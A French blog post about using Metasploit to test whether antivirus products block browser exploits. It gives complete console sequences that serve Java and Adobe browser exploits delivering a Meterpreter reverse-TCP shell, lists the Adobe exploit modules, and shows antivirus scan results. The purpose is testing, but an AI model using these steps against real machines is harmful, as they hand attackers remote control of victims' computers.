Metasploit – test de pénétration: présentation

 

Metasploit et test antivirus

Les exemples ci-dessus sont plutôt triviaux et donne un aperçu des possibilités.
Tester un antivirus sur une vulnérabilité à distance dotn la connexion sera bloqué par le pare-feu Windows bon voila.
Eventuellement on peux voir la réaction sur le keylogging, mais bon, y a 31 façons de faire du keylogging (de l’injection de processus et hook, aux hooks sur le kernel à divers niveaux  – ce n’est pas parce que votre antivirus en détecte un qui bloque tout le keylogging).
Ce qui fait la force de MetaSploit ce sont les scripts fournis.

On peux aussi simuler un serveur WEB contenant des exploits sur site WEB et charger le Payload qui nous interresse.


Ici un serveur WEB qui lance le PAYLOAD du shell inversé.

Le script correspond à l’exploit Java utilisé ci-dessous n’est pas fourni par défaut mais est dispo ici : http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
(prendre le source code et le collé dans le répertoire  msf3/modules/exploits/windows/browser).

On lance alors le serveur WEB et l’exploit par les commandes (changer l’adresse IP pour votre serveur metasploit) :

use windows/browser/java_ws_arginject_altjvm
set SRVHOST 192.168.1.10
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit
Par défaut, il y a aussi des exploits Adobe Reader ou Flash, le code est le même il faut simplement changer le script de départ :
use windows/browser/adobe_jbig2decode
set SRVHOST 192.168.1.10
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

Les scripts Adobe disponible :

adobe_cooltype_sing.rb	  adobe_flashplayer_flash10o.rb     adobe_flatedecode_predictor02.rb  adobe_jbig2decode.rb	adobe_shockwave_rcsl_corruption.rb
adobe_flashplayer_avm.rb  adobe_flashplayer_newfunction.rb  adobe_geticon.rb		      adobe_media_newplayer.rb	adobe_utilprintf.rb

on prend la main sur le numéro de la session, via la commande sessions -i <num session>

Ci-dessous, on peux voir une machine avec Microsoft Security Essentials ou le shell se charge sans soucis à travers l’exploit Java :

Avast! le bloque sans soucis :

http://www.virustotal.com/file-scan/report.html?id=01fbfebdf89baea6052baccbc0d78e37b1d9cb00d6e870e0236656a45e7002da-1322841883

File name: USNLDwjSq[1].txt
Submission date: 2011-12-02 16:04:43 (UTC)
Current status: queued queued analysing finished
Result: 6/ 43 (14.0%)

Compact Print results
Antivirus Version Last Update Result
Avast 6.0.1289.0 2011.12.02 JS:Jaderun-G [Expl]
AVG 10.0.0.1190 2011.12.02 Exploit
Kaspersky 9.0.0.837 2011.12.02 HEUR:Exploit.Script.Generic
NOD32 6668 2011.12.01 JS/Exploit.JavaDepKit.A
Panda 10.0.3.5 2011.12.02 Java/Exploit_2010-0886 

Additional informationShow all
MD5   : 46eb42221dec9ced1dc284317d062181
SHA1  : 896bebb9992b689cc56ebfc817a6b860b87a3393
SHA256: 01fbfebdf89baea6052baccbc0d78e37b1d9cb00d6e870e0236656a45e7002da

Un ‘exploit qui vise Internet Explorer :

 

Ce qui est dommage, c’est que je n’ai pas trouvé de script pour effectuer des injections de processus, prendre le contrôle et effectuer des connexions afin de télécharger un malware.
Chose dont je parle (notamment sur le comparatif d’Avast!, Zone Alarm Free et F-Secure) sur le comparatif des antivirus 2012.

Conclusion

MetaSploit s’avère être un outil très interressant, notamment par exemple, si une nouvelle vulnérabilité sort, le script correspondant peux être disponible et vous pouvez tester votre système face à cette vulnérabilité.
En ce qui concerne le test des antivirus, c’est à prendre à des pincettes, je veux dire, il ne faut pas tirer de conclusions trop hatives.
Par exemple pour les exploits sur site WEB, on voit bien que Microsoft Security Essentials se fait avoir, et Avast! non.
Cela est confirmé par le le comparatif des antivirus 2012 où Microsoft Security Essential est faible de ce côté, mais cela veux pas dire qu’Avast! va protéger de tous les exploits sur site WEB, puisque le code des exploits est souvent offusqué justement pour ne pas être détecté par les antivirus (après il y a aussi le blacklist des URLs qui entre en jeux).
Reste que MetaSploit reste un outil qui peux être mis en place par n’importe qui pour faire ses petits tests sans risque.
Print Friendly, PDF & Email
(Visité 1 361 fois, 4 visites ce jour)

One Response

  1. larabutu 4 mai 2012

Add Comment